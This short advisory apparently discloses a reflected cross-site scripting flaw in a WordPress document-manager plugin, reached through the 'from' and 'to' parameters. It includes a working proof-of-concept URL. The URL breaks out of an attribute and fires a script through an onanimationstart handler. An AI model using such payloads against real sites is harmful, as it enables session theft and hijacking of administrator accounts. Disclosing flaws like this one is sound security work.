The plugin is vulnerable to attribute-based Reflected Cross-Site Scripting via the from and to parameters in the ~/functions.php file which allows attackers to inject arbitrary web scripts
https://example.com/wp-admin/admin.php?page=sp-client-document-manager&from;=" style=animation-name:rotation onanimationstart=alert(/XSS-from/)//&to;=" style=animation-name:rotation onanimationstart=alert(/XSS-to/)//